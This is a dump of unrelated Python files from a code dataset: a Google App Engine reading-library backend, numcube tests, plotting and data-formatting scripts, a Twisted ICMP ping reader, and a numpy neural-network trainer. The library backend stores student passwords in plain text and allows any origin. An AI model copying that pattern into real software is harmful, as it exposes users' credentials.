        # Student(), so the None fallback below could never trigger.
        q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1",loginUser)
        theStudent = q.get()
        if theStudent == None:
            libaryList = [1113,1114,1115]
        else:
            libaryList = theStudent.bookList
        query = Book.all();
        #DEMO CODE: seed the global catalogue if empty.
        if query.count() == 0:
            newBook = Book(title = "Sleeping Beauty", genre = "Fantasy", isbn = int(1113), cover = "img/book_1.jpg", link = Host+"library/1113/")
            newBook.put()
            newBook = Book(title = "Moby Dick", genre = "Fantasy", isbn = int(1114), cover = "img/book_2.jpg", link = Host+"library/1114/")
            newBook.put()
            newBook = Book(title = "Where The Wild Things Are", genre = "Fantasy", isbn = int(1115), cover= "img/book_3.jpg" , link = Host+"library/1115/")
            newBook.put()
        query = Book.all()
        if self.json:
            self.response.headers.add_header('Access-Control-Allow-Origin', '*')
            # NOTE(review): elsewhere headers are set via self.response.headers;
            # verify response.out exposes 'headers' in this webapp2 version.
            self.response.out.headers['Content-Type'] = "text/json"
        books = []
        #look up each book in the student's list by its isbn number
        for isbnN in libaryList:
            q = db.GqlQuery("SELECT * FROM Book " + "WHERE isbn = :1",int(isbnN))
            for book in q.run(limit=1):
                books.append(book.dict())
        self.response.out.write(json.dumps(books))
        return
#app side update of stats for users
class UpdateStats(MainPage):
    def get(self, stuff):
        """Return (creating if absent) the Stat record for a user/isbn pair as JSON."""
        #mostly place holder
        inUser = self.request.get('user')
        inISBN = self.request.get('isbn')
        q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1 AND isbn = :2", inUser, int(inISBN))
        returnRecord = q.get()
        if not returnRecord:
            # NOTE(review): pagesRead is left unset here (None) although
            # Stat.dict() serializes it -- confirm that is intended.
            returnRecord = Stat(isbn = int(inISBN), owner = inUser, timeSpentReading = int(0), bookmark = int(1))
            db.put(returnRecord)
        self.response.headers.add_header('Access-Control-Allow-Origin', '*')
        # NOTE(review): elsewhere headers are set via self.response.headers;
        # verify response.out exposes 'headers' in this webapp2 version.
        self.response.out.headers['Content-Type'] = "text/json"
        logging.info(returnRecord)
        self.response.out.write(json.dumps(returnRecord.dict()))
        return
    def post(self, stuff):
        """Update bookmark (always) and pagesRead (only if increased) for the record."""
        inUser = self.request.get('user')
        inISBN = self.request.get('isbn')
        inBookmark = self.request.get('bookmark')
        inPagesRead = self.request.get('pagesRead')
        q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1 AND isbn = :2", inUser, int(inISBN))
        for record in q.run(limit=1):
            record.bookmark = int(inBookmark)
            if(int(inPagesRead) > record.pagesRead):
                record.pagesRead = int(inPagesRead)
            db.put(record)
        return
#admin side stat catalogue
class StatQuery(MainPage):
    def get(self,random):
        """Render the empty stats query page."""
        self.setupUser()
        self.template_values['title'] = 'Stats'
        self.render('stats.html')
        return
    def post(self, somerandomfieldthatbreakeverythingifnothere):
        """Render the stats page filtered to the submitted user's records."""
        self.setupUser()
        Owner = self.request.get('user')
        q = db.GqlQuery("SELECT * FROM Stat " + "WHERE owner = :1", Owner)
        self.template_values['title'] = 'Stats'
        self.template_values['stats']=q
        self.render('stats.html')
        return
#admin side user catalogue
class StudentHandler(MainPage):
    def get(self, studentID):
        """Render the list of all students."""
        self.setupUser()
        query = Student.all()
        logging.info(query.count())
        self.template_values['students'] = query
        self.template_values['title'] = 'Your Students'
        self.render('studentlist.html')
        return
    def post(self, studentID):
        """Create a student from the submitted form and seed its default stats."""
        self.setupUser()
        fName = self.request.get('firstName')
        lName = self.request.get('lastName')
        UserName = self.request.get('user')
        Password = self.request.get('password')
        teacher = self.request.get('teacher')
        grade = self.request.get('grade')
        newStudent = Student(firstName = fName,
                             lastName = lName,
                             user = UserName,
                             password = Password,
                             teacher = teacher,
                             grade = int(grade),
                             bookList=[1113,1114],
                             )
        newStudent.put()
        # Seed reading stats for the two default books.
        newStat = Stat(parent = newStudent, isbn = 1113, owner = UserName, pagesRead = 0, bookmark = 1)
        newStat.put()
        newStat = Stat(parent = newStudent, isbn = 1114, owner = UserName, pagesRead = 0, bookmark = 1)
        newStat.put()
        self.redirect('/student')
        return
#admin side: assign an existing book to a student's personal list
class AddBooks(MainPage):
    def get(self, stuff):
        """Render the empty add-book form."""
        self.setupUser()
        self.template_values['title'] = 'Student Books'
        self.template_values['Returnsuccess'] = ''
        self.render('booklist.html')
        return
    def post(self, stuff):
        """Append an isbn to a student's bookList if both student and book exist."""
        self.setupUser()
        UserName = self.request.get('user')
        Isbn = self.request.get('isbn')
        if (UserName != '' and Isbn != ''):
            q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1",UserName)
            q2 = db.GqlQuery("SELECT * FROM Book " + "WHERE isbn = :1",int(Isbn))
            if (q2.count() > 0 and q.count() > 0):
                for userN in q.run(limit = 1):
                    userN.bookList.append(int(Isbn))
                    userN.put()
                #self.redirect('/addBook')
                self.template_values['Returnsuccess'] = "Success"
                self.render('booklist.html')
            else:
                #self.redirect('/addBook')
                self.template_values['Returnsuccess'] = "Failure"
                self.render('booklist.html')
        else:
            # Missing form fields -> same failure page.
            self.template_values['Returnsuccess'] = "Failure"
            self.render('booklist.html')
        return
#admin side global book catalogue (note: 'Libary' spelling is load-bearing in routes)
class Libary(MainPage):
    def get(self, stuff):
        """Render every book in the library."""
        self.setupUser()
        q = Book.all()
        books = []
        #replace with template
        self.template_values['title']='Library'
        self.template_values['books'] = q
        self.render('libarylist.html')
    def post(self, stuff):
        """Register a new book record (the file itself is transferred separately)."""
        #note the book file should be transferred using standard ftp and then this record should be added
        #do not post this first
        Title = self.request.get('title')
        Isbn = self.request.get('isbn')
        Genre = self.request.get('genre')
        Cover = self.request.get('cover')
        Link = self.request.get('link')
        newbook = Book(title = Title, genre = Genre, isbn = int(Isbn), cover = Cover, link = Host + Link)
        newbook.put()
        self.redirect('/libary')
        return
#datastore model for a student account
class Student(db.Model):
    user = db.StringProperty()          # login name (unique by convention)
    firstName = db.StringProperty()
    lastName = db.StringProperty()
    teacher = db.StringProperty()
    grade = db.IntegerProperty()
    wordsDefined = db.IntegerProperty()
    timeReading = db.IntegerProperty()
    password = db.StringProperty()      # NOTE(review): stored in plain text
    bookList = db.ListProperty(int)     # isbn numbers of assigned books
    def id(self):
        """Numeric datastore id of this entity."""
        return self.key().id()
    def dict(self):
        """JSON-serializable summary (omits password and login name)."""
        theStudentDict = {}
        theStudentDict['id'] = self.id()
        theStudentDict['firstName'] = self.firstName
        theStudentDict['lastName'] = self.lastName
        theStudentDict['teacher'] = self.teacher
        theStudentDict['grade'] = self.grade
        theStudentDict['isbnList'] = self.bookList
        return theStudentDict
#datastore model for a book in the global catalogue
class Book(db.Model):
    title = db.StringProperty()
    genre = db.StringProperty()
    isbn = db.IntegerProperty()
    cover = db.StringProperty()   # cover image path/URL
    link = db.StringProperty()    # absolute URL to the book content
    def dict(self):
        """JSON-serializable view of all book fields."""
        theBookDict = {}
        theBookDict['title'] = self.title
        theBookDict['genre'] = self.genre
        theBookDict['isbn'] = self.isbn
        theBookDict['cover'] = self.cover
        theBookDict['link'] = self.link
        return theBookDict
#datastore model for per-user, per-book reading statistics
class Stat(db.Model):
    isbn = db.IntegerProperty()             # book this stat belongs to
    owner = db.StringProperty()             # Student.user of the reader
    pagesRead = db.IntegerProperty()
    timeSpentReading = db.IntegerProperty()
    bookmark = db.IntegerProperty()         # last page the reader was on
    def dict(self):
        """JSON-serializable subset sent to the reading app."""
        stat = {}
        stat['bookmark'] = self.bookmark
        stat['pagesRead'] = self.pagesRead
        return stat
#class Bookshelf(db.Model):# books = db.ListProperty(long)
#    sort = db.IntegerProperty() # Sort by this variable
#    positions = db.ListProperty(long)
# URL routing table; each handler is mounted with and without a trailing path
# segment, and MainPage is the catch-all.
app = webapp2.WSGIApplication([('/student()', StudentHandler), ('/student/(.*)', StudentHandler),
                               ('/book()', BookHandler), ('/login()',LoginHandler), ('/stats()', UpdateStats),
                               ('/addBook()',AddBooks), ('/addBook/(.*)',AddBooks),
                               ('/libary()',Libary), ('/libary/(.*)', Libary),
                               ('/stat()', StatQuery),('/stat/(.*)', StatQuery),
                               ('/.*', MainPage)], debug=True)
997,736 | 23e857de8ce487a096c673f99188a79123206a0e | import unittest
import numpy as np
from numcube import Index
class IndexTests(unittest.TestCase):
    """Unit tests for numcube.Index: construction, selection, lookup, membership."""
    def test_create_index(self):
        """Valid construction keeps name/length; duplicates and bad names raise."""
        a = Index("A", [10, 20, 30])
        self.assertEqual(a.name, "A")
        self.assertEqual(len(a), 3)
        a = Index("Dim", ["a", "b", "c", "d"])
        self.assertEqual(a.name, "Dim")
        self.assertEqual(len(a), 4)
        # duplicate values
        self.assertRaises(ValueError, Index, "A", ["a", "b", "a"])
        self.assertRaises(ValueError, Index, "A", [0, 1, 1])
        # invalid Index name
        self.assertRaises(TypeError, Index, 1, [1, 2, 3])
    def test_index_take(self):
        """take() selects by position, preserves name, rejects duplicate picks."""
        a = Index("A", ["a", "b", "c", "d"])
        self.assertEqual(a.take([0, 2]).name, "A") # keep name
        self.assertTrue(np.array_equal(a.take([0, 2]).values, ["a", "c"]))
        self.assertTrue(np.array_equal(a.take([2, 0]).values, ["c", "a"]))
        self.assertRaises(ValueError, a.take, [0, 2, 0]) # duplicate values in Index
    def test_compress(self):
        """compress() with a boolean mask matches boolean indexing and numpy compress."""
        a = Index("A", ["a", "b", "c", "d"])
        selector = [True, False, True, False]
        b = a.compress(selector)
        c = a[np.array(selector)]
        self.assertTrue(np.array_equal(b.values, c.values))
        self.assertEqual(a.name, b.name) # keep name
        self.assertTrue(np.array_equal(b.values, a.values.compress(selector)))
    def test_writeable(self):
        # once index has been created, its values cannot be changed in order not to break lookup function
        a = Index("A", [10, 20, 30])
        self.assertRaises(ValueError, a.values.__setitem__, 0, 40)
        self.assertRaises(ValueError, a.values.sort)
    def test_indexof(self):
        """indexof() maps values to positions; missing values raise KeyError."""
        a = Index("A", [10, 20, 30])
        b = Index("Dim", ["ab", "bc", "cd", "de"])
        # a single value
        self.assertEqual(a.indexof(10), 0)
        self.assertEqual(b.indexof("cd"), 2)
        self.assertEqual(b.indexof(["cd"]), 2)
        # multiple values
        self.assertTrue(np.array_equal(a.indexof([10, 30]), [0, 2]))
        self.assertTrue(np.array_equal(b.indexof(["de", "cd"]), [3, 2]))
        # non-existent value raises KeyError (similar to dictionary lookup)
        self.assertRaises(KeyError, a.indexof, 0)
        self.assertRaises(KeyError, b.indexof, "ef")
        self.assertRaises(KeyError, b.indexof, None)
        self.assertRaises(KeyError, a.indexof, [0, 1])
        self.assertRaises(KeyError, b.indexof, ["de", "ef"])
    def test_operator_in(self):
        """The 'in' operator tests single-value membership."""
        a = Index("A", [10, 20, 30])
        b = Index("B", ["ab", "bc", "cd", "de"])
        self.assertTrue(20 in a)
        self.assertFalse(40 in a)
        self.assertTrue("bc" in b)
        self.assertFalse("ef" in b)
        # unlike Index.contains() operator 'in' cannot work with multiple values
        #self.assertRaises(TypeError, a, __contains__, [0, 10])
        #self.assertRaises(TypeError, a, __contains__, (0, 10))
    def test_contains(self):
        """contains() handles single values and element-wise vectorized lookups."""
        a = Index("A", [10, 20, 30])
        b = Index("B", ["ab", "bc", "cd", "de"])
        # a single value (in this case, operator 'in' is preferred)
        self.assertTrue(a.contains(20))
        self.assertFalse(a.contains(40))
        self.assertTrue(b.contains("bc"))
        self.assertFalse(b.contains("ef"))
        # multiple values returns one-dimensional numpy array of logical values
        self.assertTrue(np.array_equal(a.contains([0, 10, 20, 40]), [False, True, True, False]))
        self.assertTrue(np.array_equal(b.contains(["ab"]), [True]))
        self.assertTrue(np.array_equal(b.contains(["ab", "ef", "bc"]), [True, False, True]))
        self.assertTrue(np.array_equal(b.contains(("ab", "ef", "bc")), [True, False, True]))
|
997,737 | d41c5f2102188d3bc7fcf1fc66da9cd089cbdb01 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 5 11:32:38 2016
@author: maestre
"""
import matplotlib.pyplot as plt
import numpy as np
# Fake up some data: a spread of integers around 0, a block of zeros at the
# center, and high/low outliers ("fliers").
#spread = np.random.rand(50) * 100
spread = np.random.randint(-15,15, 50)
#center = np.ones(1) * 50
center = np.zeros(50)
#flier_high = np.random.rand(10) * 100 + 100
flier_high = np.random.randint(5, 25, 10)
#flier_low = np.random.rand(10) * -100
flier_low = np.random.randint(-25, -5, 10)
data = np.concatenate((spread, center, flier_high, flier_low), 0)
# basic plot
#plt.boxplot(data)
## notched plot
#plt.figure()
#plt.boxplot(data, 1)
#
## change outlier point symbols
#plt.figure()
#plt.boxplot(data, 0, 'gD')
#
## don't show outlier points
#plt.figure()
#plt.boxplot(data, 0, '')
#
## horizontal boxes
#plt.figure()
#plt.boxplot(data, 0, 'rs', 0)
#
## change whisker length
#plt.figure()
#plt.boxplot(data, 0, 'rs', 0, 0.75)
#
# fake up some more data for a second box
spread = np.random.rand(50) * 100
center = np.ones(25) * 40
flier_high = np.random.rand(10) * 100 + 100
flier_low = np.random.rand(10) * -100
d2 = np.concatenate((spread, center, flier_high, flier_low), 0)
data.shape = (-1, 1)
d2.shape = (-1, 1)
# data = concatenate( (data, d2), 1 )
# Making a 2-D array only works if all the columns are the
# same length. If they are not, then use a list instead.
# This is actually more efficient because boxplot converts
# a 2-D array into a list of vectors internally anyway.
data = [data, d2]
# multiple box plots on one figure
plt.figure()
plt.boxplot(data)
plt.show()
997,738 | 1610e1c5da800c784d8acac4fc363b1bc4b65bbc | from datetime import timedelta, datetime
import traceback
from csv_utils import read_csv
DATE_TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
def write_to_file(file_name, data):
    """Write the items of *data* to *file_name*, one per line (no trailing newline)."""
    joined = '\n'.join(data)
    with open(file_name, 'w') as out:
        out.write(joined)
    print("File generated")
def format_rain(csv_file, start):
    """Convert a rain-gauge CSV time series into a RAIN.DAT file.

    :param csv_file: path to a CSV whose rows are (timestamp, rainfall) pairs,
        with timestamps formatted per DATE_TIME_FORMAT
    :param start: datetime used as hour zero for the output time axis
    """
    timeseries = read_csv(csv_file)
    # First pass: total rainfall and its running (cumulative) sum.
    total_rain = 0
    cumulative_timeseries = []
    for row in timeseries:
        total_rain += float(row[1])
        cumulative_timeseries.append(total_rain)
    # Second pass: one "R <hours-since-start> <cumulative fraction>" line per
    # sample.  (The previous version also computed an unused per-sample
    # rain fraction; that dead local has been removed.)
    # NOTE(review): total_rain == 0 would raise ZeroDivisionError here --
    # confirm whether all-zero rain inputs are possible.
    rain_dat = []
    for row, cumulative in zip(timeseries, cumulative_timeseries):
        time_col = ((datetime.strptime(row[0], DATE_TIME_FORMAT) - start).total_seconds())/3600
        rain_dat.append("R {} {}".format('%.4f' % time_col, cumulative/total_rain))
    # Header lines, inserted in reverse order so they end up on top.
    rain_dat.insert(0, "R 0 0")
    rain_dat.insert(0, "{} 5 0 0".format(total_rain))
    rain_dat.insert(0, "0 0 ")
    write_to_file("RAIN.DAT", rain_dat)
# format_rain("6531.csv", datetime.strptime("2019-06-12 23:30:00", DATE_TIME_FORMAT))
def generate_time_values(start, end):
    """Emit 5-minute timestamps from *start* until *end* is reached.

    Prints each generated timestamp and its elapsed-hours value, then writes
    the elapsed hours (4 decimal places, one per line) to times.DAT.
    """
    start = datetime.strptime(start, DATE_TIME_FORMAT)
    end = datetime.strptime(end, DATE_TIME_FORMAT)
    step = timedelta(minutes=5)
    times_original = [start]
    while times_original[-1] < end:
        next_time = times_original[-1] + step
        times_original.append(next_time)
        print(next_time)
    times = []
    for stamp in times_original:
        elapsed_hours = (stamp - start).total_seconds() / 3600
        times.append("{}".format('%.4f' % elapsed_hours))
        print(elapsed_hours)
    write_to_file("times.DAT", times)
# generate_time_values(start="2019-06-01 00:00:00", end="2019-06-20 00:00:00") |
997,739 | feeb1a2f4e4289dc1cb80779806fa7fffd1e9593 | import pytest
from ..__main__ import defaultdict
def test_case_1():
    """Indices (1-based) of each key of ['a','b','c'] within the input list; absent keys yield [-1]."""
    assert defaultdict(['a','a','b','a','b'],['a','b','c']) == [[1,2,4],[3,5],[-1]]
|
997,740 | 80610e200559754c9964fdbf41773840d3564207 | import socket, errno, struct, time
from twisted.internet import main, error
from twisted.python import log
class IcmpReader(object):
    """
    A simple ICMP reader registered with the Twisted reactor.
    It reads all ICMP messages and does simple processing on them:
    - rtt calculation (from a timestamp embedded in the echo payload)
    - sender identity check (packet id must equal the source IP)
    """
    def __init__(self, socket, callback=None, hosts=[]):
        # NOTE(review): mutable default argument, and 'hosts' is later used
        # as a mapping (iteritems / [addr] lookup) although the default is a
        # list -- confirm callers always pass a dict.
        self.socket = socket
        self.callback = callback
        self.hosts = hosts
        from twisted.internet import reactor
        reactor.addReader(self)
    def fileno(self):
        """File descriptor for the reactor; -1 once the socket is gone."""
        try:
            return self.socket.fileno()
        except socket.error:
            return -1
    def printStats(self):
        """Dump per-host state collected so far."""
        for host_addr, host in self.hosts.iteritems():
            print host
    def connectionLost(self, reason):
        """Close the socket, deregister from the reactor, and print stats."""
        self.socket.close()
        from twisted.internet import reactor
        reactor.removeReader(self)
        self.printStats()
    def processPacket(self, recv_packet, addr):
        """Validate one received ICMP packet, update host stats, invoke callback."""
        # skip first 20 bytes for IP header, and 4 bytes of:
        # packet type, something else and the checksum
        icmp_header = recv_packet[24:40]
        # Payload layout: packet id (I), sequence (h), send timestamp (d);
        # native alignment pads this to the 16 bytes sliced above.
        packet_id, sequence, timestamp = struct.unpack(
            #428
            "Ihd", icmp_header
        )
        rtt = time.time() - timestamp
        # extract the source of this echo packet
        # and compare it with the id included in payload
        (src_ip,) = struct.unpack("!I", recv_packet[12:16])
        if packet_id != src_ip:
            log.msg("ignoring received packet with an unknown ID {}, should be: {}".format(packet_id, src_ip))
            return
        try:
            host = self.hosts[addr]
            host.updateStats(rtt)
        except KeyError:
            log.msg("host {} not found in the hosts table".format(addr,))
            return
        # ignore if it's not an echo reply message
        # if packet_type == 0:
        #     self.removeTimeout(addr, sequence)
        if self.callback is None:
            log.msg("got packet: ", packet_id, sequence, addr, "rtt:" ,rtt)
        else:
            self.callback(host, rtt)
    def doRead(self):
        """Drain the socket; stop on EWOULDBLOCK, report other errors as lost."""
        while True:
            try:
                recv_packet, addr = self.socket.recvfrom(1024)
            except socket.error, e:
                if e.args[0] == errno.EWOULDBLOCK:
                    break
                return main.CONNECTION_LOST
            self.processPacket(recv_packet, addr[0])
    def logPrefix(self):
        """Prefix used by Twisted's logging for this reader."""
        return "IcmpReader"
|
997,741 | 13dda0f6c7282044139e083f013d9a9312a921e9 | # Core Pkgs
import streamlit as st
from memory_profiler import profile
@profile
def main():
    """Minimal Streamlit app used to demonstrate memory profiling of a UI."""
    # NOTE(review): "Memeory" typo is in a user-visible string; fixing it
    # changes rendered output, so it is only flagged here.
    st.title("Memeory Profiling Streamlit Apps")
    menu = ["Home","Text Analysis","About"]
    choice = st.sidebar.selectbox("Menu",menu)
    # Show a subheader matching the sidebar selection.
    if choice == "Home":
        st.subheader("Home")
    elif choice == "Text Analysis":
        st.subheader("Text Analysis")
    else:
        st.subheader("About")
if __name__ == '__main__':
    main()
# How to Run
# python3 -m memory_profiler app.py
# mprof run app.py
# mprof plot |
997,742 | ac1f10c2bc528b6a6eef66dd13550b2b219c7dea | """ h_letters = [letter for letter in 'human']
print(h_letters)
this_list = []
for x in 'human':
this_list.append(x)
print(this_list)
h_nums = [num*2 for num in range(1,11)]
print(h_nums)
number_list = [x for x in range(20) if x % 2 == 0]
print(number_list)
number_list_two = ['Even' if x % 2 == 0 else 'Odd' for x in range(10)]
print(number_list_two) """
# A list of tuples with heterogeneous lengths and element types, printed as-is.
test_list = [('gfg', 1, True),('is', False),('best', 2)]
print(f'The original list : {test_list}')
# Practice script: list indexing, mutation, sorting, and reversing.
bicycles = ['trek', 'cannondale', 'redline', 'specialized']
print(bicycles)
print(bicycles[0])
# Build a sentence from the first element, title-cased.
message = "my first bicycle was a {}.".format(bicycles[0].title())
print(message)
motorcycles = ["honda", 'yamaha', "suzuki"]
print(motorcycles)
# Replace the first element, append a duplicate, then wipe the list.
motorcycles[0] = "ducati"
print(motorcycles)
motorcycles.append("ducati")
print(motorcycles)
motorcycles.clear()
print(motorcycles)
# Rebuild the list and practice positional insert/removal.
motorcycles.extend(["honda", "yamaha", "suzuki"])
print(motorcycles)
motorcycles.insert(1, "ducati")
print(motorcycles)
motorcycles.pop(1)  # same effect as `del motorcycles[1]`
print(motorcycles)
# pop() without an index removes and returns the last element.
popped_motorcycle = motorcycles.pop()
print(popped_motorcycle)
print(motorcycles)
motorcycles = ["honda", 'yamaha', "suzuki"]
print(motorcycles)
popped_motorcycle = motorcycles.pop(2)
print(popped_motorcycle)
print(motorcycles)
# remove() deletes the first matching value.
motorcycles = ["honda", 'yamaha', "suzuki", "ducati"]
print(motorcycles)
motorcycles.remove("ducati")
print(motorcycles)
# In-place sorting, ascending then descending.
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
# sorted() returns a new list and leaves the original untouched.
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
print(sorted(cars))
print(cars)
print(sorted(cars, reverse=True))
# reverse() flips order without sorting; len() gives the element count.
cars = ["bmw", "auid", "toyota", "subaru"]
print(cars)
cars.reverse()
print(cars)
print(len(cars))
997,744 | e81d080a47c45c6f897daabf6e88256f5e58d93d | import random
# Draw one pseudo-random integer in the inclusive range [0, 1000] and print it.
randomNumber = random.randint(0, 1000)
print(randomNumber)
|
997,745 | 9c959ec708e911a49892d9eef8ead745d289d6c2 | import numpy as np
import matplotlib.pyplot as plt
import test
import copy as cp
# Rectified linear unit (ReLU), written arithmetically so it works
# elementwise on scalars and numpy arrays alike.
def rel(z):
    """Return max(z, 0) elementwise, computed as (|z| + z) / 2."""
    return (abs(z) + z) * 0.5
# Scatter-plot classified samples on the given axes: label 1 -> red, else green.
def show_ans(x_s, y_s, m_s, subplt):
    """Plot m_s points from x_s (2 x m_s) colored by the labels in y_s (1 x m_s)."""
    for k in range(0, m_s):
        if y_s[0, k] == 1:
            subplt.plot(x_s[0, k], x_s[1, k], 'ro')
        else:
            subplt.plot(x_s[0, k], x_s[1, k], 'go')
    # y1 = -b_s / w_s[0, 1]
    # y2 = -(100 * w_s[0, 0] + b_s) / w_s[0, 1]
    # plt.plot([0, 100], [y1, y2])
# Plot the training-error curve (err_data = [iterations, cost values]).
def show_err(subplt, err_data):
    """Clear the axes and redraw cost vs. iteration."""
    subplt.cla()
    subplt.plot(err_data[0], err_data[1])
# Visualize the decision regions: run a grid of points through the trained
# network and scatter-plot the predicted class of each grid point.
def show_class(W, b, n, g, max, min, subplt):
    """Forward-propagate a 16x16-ish grid over [min, max] and plot predictions.

    W, b: per-layer weights/biases; n: layer sizes; g: per-layer activation
    names ('RELU'/'sigmoid'); subplt: matplotlib axes to draw on.
    """
    X_t = np.arange(min[0], max[0], max[0] / 16)
    Y_t = np.arange(min[1], max[1], max[1] / 16)
    X_temp = [[], []]
    Z_t = []
    A_t = []
    # Build all (x, y) grid coordinates as two parallel lists.
    for i in X_t:
        for j in Y_t:
            X_temp[0].append(i)
            X_temp[1].append(j)
    m_t = len(X_temp[0])
    X_t = np.array(X_temp).reshape(2, m_t)
    # forward pass through every layer
    Z_t.clear()
    A_t.clear()
    for i in range(len(n)):
        if i == 0:
            Z_t.append(np.dot(W[i], np.array(X_t).reshape(2, m_t)) + b[i])
        else:
            Z_t.append(np.dot(W[i], A_t[i - 1]) + b[i])
        if g[i] == 'RELU':
            A_t.append(rel(Z_t[i]))
        elif g[i] == 'sigmoid':
            A_t.append(1.0 / (1.0 + np.exp(-Z_t[i])))
    # Threshold the final sigmoid activations into hard 0/1 predictions.
    Y_tra_t = cp.deepcopy(A_t[len(n) - 1])
    Y_tra_t[Y_tra_t >= 0.5] = 1
    Y_tra_t[Y_tra_t < 0.5] = 0
    show_ans(X_t, Y_tra_t, m_t, subplt)
# Load the training set: each CSV line is "x1,x2,label".
# NOTE(review): the file handle is never closed, and temp[2][0] keeps only the
# first character of the label field -- confirm labels are single digits.
fo = open("data1.txt")
x_temp = []
y_temp = []
for line in fo:
    temp = line.split(',')
    x_temp += [float(f) for f in temp[0:2]]
    y_temp += [float(f) for f in temp[2][0]]
# Hyperparameters: learning rate and momentum coefficient.
alpha = 3.5
# alpha = 5
beta = 0.9
# X: (features v x samples m); Y: (1 x m) labels.
X = np.array(x_temp).reshape(int(len(x_temp) / 2), 2).T
Y = np.array(y_temp).reshape(1, int(len(y_temp)))
# init par: network architecture (layer sizes n, activations g).
v = len(X)
m = len(X[0])
n = [4, 4, 4,4,4, 1]
g = ["RELU", "RELU", "RELU","RELU","RELU", "sigmoid"]
W = []
b = []
gamma = []
Z = []
A = []
j = 1
epsilon = 0.00000000000001
loop = 10000
# Per-layer gradient and optimizer-state buffers.
dJdZ = [0] * len(n)
dJdZ_cali = [0] * len(n)
dJdZ_norm = [0] * len(n)
dJdW = [0] * len(n)
dJdb = [0] * len(n)
VdJdW = [0] * len(n)
VdJdb = [0] * len(n)
SdJdW = [0] * len(n)
SdJdb = [0] * len(n)
err = [[], []]
fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
fig3, ax3 = plt.subplots()
fig4, ax4 = plt.subplots()
# Random weight initialization; biases start at zero.
for i in n:
    if j == 1:
        W.append(np.random.randn(i, v))
        # W.append(np.ones(i * v).reshape(i, v))
        j += 1
    else:
        W.append(np.random.randn(i, last_i))
        # W.append(np.ones(i * last_i).reshape(i, last_i))
    b.append(np.zeros(i).reshape(i, 1))
    gamma.append(np.ones(i).reshape(i, 1))
    last_i = i
# normalize the input features (center, scale, then rescale by the max).
miu = np.mean(X, 1).reshape(v, 1)
X = X - miu
lambd = np.mean(np.square(X), 1).reshape(v, 1)
X = X / lambd
X = X / np.max(X[0, :])
X_max = [1, 1]
X_min = [-1, -1]
# X_max = [np.ceil(np.max(X[0, :])), np.ceil(np.max(X[1, :]))]
# X_min = [np.floor(np.min(X[0, :])), np.floor(np.min(X[1, :]))]
# training loop counter
j = 0
# Main training loop: forward pass, cross-entropy cost, backprop, momentum update.
for j in range(loop):
    # while True:
    # forward pass through every layer
    Z.clear()
    A.clear()
    for i in range(len(n)):
        if i == 0:
            Z.append(np.dot(W[i], np.array(X).reshape(v, m)) + b[i])
        else:
            Z.append(np.dot(W[i], A[i - 1]) + b[i])
        if g[i] == 'RELU':
            A.append(rel(Z[i]))
        elif g[i] == 'sigmoid':
            A.append(1.0 / (1.0 + np.exp(-Z[i])))
    # Hard 0/1 predictions from the final sigmoid layer.
    Y_tra = cp.deepcopy(A[len(n) - 1])
    Y_tra[Y_tra >= 0.5] = 1
    Y_tra[Y_tra < 0.5] = 0
    print("-------------------------")
    # Cross-entropy cost; epsilon guards log(0).
    J = -(np.dot(Y, np.log(A[len(n) - 1] + epsilon).T) + np.dot((1 - Y), np.log(1 - A[len(n) - 1] + epsilon).T)) / m
    print(J[0][0])
    if J[0][0] < 0.01:
        break
    err[0].append(j + 1)
    err[1].append(J[0][0])
    # backward pass: output-layer gradient, then propagate layer by layer.
    dJdZ[len(n) - 1] = (A[len(n) - 1] - Y) / m
    for i in range(len(n)):
        if len(n) - 1 - i == 0:
            dJdW[len(n) - 1 - i] = np.dot(dJdZ[len(n) - 1 - i], X.T)
        else:
            dJdW[len(n) - 1 - i] = np.dot(dJdZ[len(n) - 1 - i], A[len(n) - 1 - i - 1].T)
        dJdb[len(n) - 1 - i] = np.sum(dJdZ[len(n) - 1 - i], 1, None, None, True)
        # print(dJdW[len(n) - 1 - i])
        if i <= len(n) - 2:
            # Multiply by the previous layer's activation derivative.
            temp_matrix = cp.deepcopy(Z[len(n) - 1 - i - 1])
            if g[len(n) - 1 - i - 1] == 'RELU':
                temp_matrix[temp_matrix <= 0] = 0
                temp_matrix[temp_matrix > 0] = 1
            elif g[len(n) - 1 - i - 1] == 'sigmoid':
                temp_matrix_s = np.exp(-temp_matrix) / np.square(1 + np.exp(-temp_matrix))
                temp_matrix = temp_matrix_s
            dJdZ[len(n) - 1 - i - 1] = np.dot(W[len(n) - 1 - i].T, dJdZ[len(n) - 1 - i]) * temp_matrix
    # Update parameters (momentum gradient descent; alternatives kept commented).
    for ini_i in range(len(n)):
        # RMSprop gradient descent
        # SdJdW[len(n) - 1 - ini_i] = beta * SdJdW[len(n) - 1 - ini_i] + (1 - beta) * np.square(dJdW[len(n) - 1 - ini_i])
        # SdJdb[len(n) - 1 - ini_i] = beta * SdJdb[len(n) - 1 - ini_i] + (1 - beta) * np.square(dJdb[len(n) - 1 - ini_i])
        # W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * (dJdW[len(n) - 1 - ini_i]/np.sqrt(SdJdW[len(n) - 1 - ini_i]+epsilon))
        # b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * (dJdb[len(n) - 1 - ini_i]/np.sqrt(SdJdb[len(n) - 1 - ini_i]+epsilon))
        # Momentum gradient descent
        VdJdW[len(n) - 1 - ini_i] = beta * VdJdW[len(n) - 1 - ini_i] + (1 - beta) * dJdW[len(n) - 1 - ini_i]
        VdJdb[len(n) - 1 - ini_i] = beta * VdJdb[len(n) - 1 - ini_i] + (1 - beta) * dJdb[len(n) - 1 - ini_i]
        W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * VdJdW[len(n) - 1 - ini_i]
        b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * VdJdb[len(n) - 1 - ini_i]
        # General gradient descent
        # W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * dJdW[len(n) - 1 - ini_i]
